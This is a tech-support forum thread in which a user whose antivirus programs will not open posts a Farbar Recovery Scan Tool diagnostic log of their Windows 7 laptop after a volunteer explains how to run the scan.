Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Win7 won't open Avast or Malwarebytes

security avast Malwarebytes windows 7 win7 virus Malware

  • Please log in to reply

#1
vladana_91

vladana_91

    Member

  • Member
  • PipPip
  • 18 posts

Basically what the headline says - I can't seem to open Avast or Malwarebytes. When I try with Avast, it says: "We've run into a problem and need to restart your antivirus" and when I try to restart it, I get the same message. With Malwarebytes I get the message that it is unable to start and "Unable to connect the service".

I'm getting kinda worried, the performance of my laptop hasn't changed at all but I like knowing that my antivirus programs are working. Any help would be much appreciated!


  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP
  • Get FRST from http://www.bleepingc...very-scan-tool/
  • You need to download the appropriate tool for your PC.  If you don't know if you have a 32 or 64 bit system get them both.  Only one will work and that's the right one.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Check the Addition.txt box
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.  
  • Please copy and paste log back here.
  • It will generate another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

  • 0

#3
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Thank you so much for the quick reply.

 

Here is a copy of FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (18-11-2019 14:53:34)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Mixbyte Inc -> ) C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe [202024 2007-09-20] (Nero AG -> Nero AG)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0D4A518A-DF9A-4EF5-B2C9-BCCA25713362} - System32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F} => C:\Windows\system32\pcalua.exe -a E:\Boot\Setup.exe -d E:\
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {282CF3B9-D0D3-4C91-9592-8EBE019D3CD7} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8C89DC2A-A626-4A37-9C20-27E3EAD3A4E5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {AB15FF1F-7BDC-44D9-BC91-CA52A72C11A7} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {BA2E555B-536B-40B0-8F32-8AE50F08B90F} - System32\Tasks\igfxhk => C:\Users\Vladana\AppData\Roaming\Terq\srvce.exe
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D00D3C68-28B6-430D-83FD-061E0EAFCDA9} - System32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\AppData\Local\TNT2\2.0.0.1534\TNT2User.exe -c /UNINSTALL PARTNER=10513
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {EF68E912-4810-45BB-A8DF-394E2CB49789} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
Handler: WSKVAllmytubechrome - {91AB862D-07B8-4A85 -  No File
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
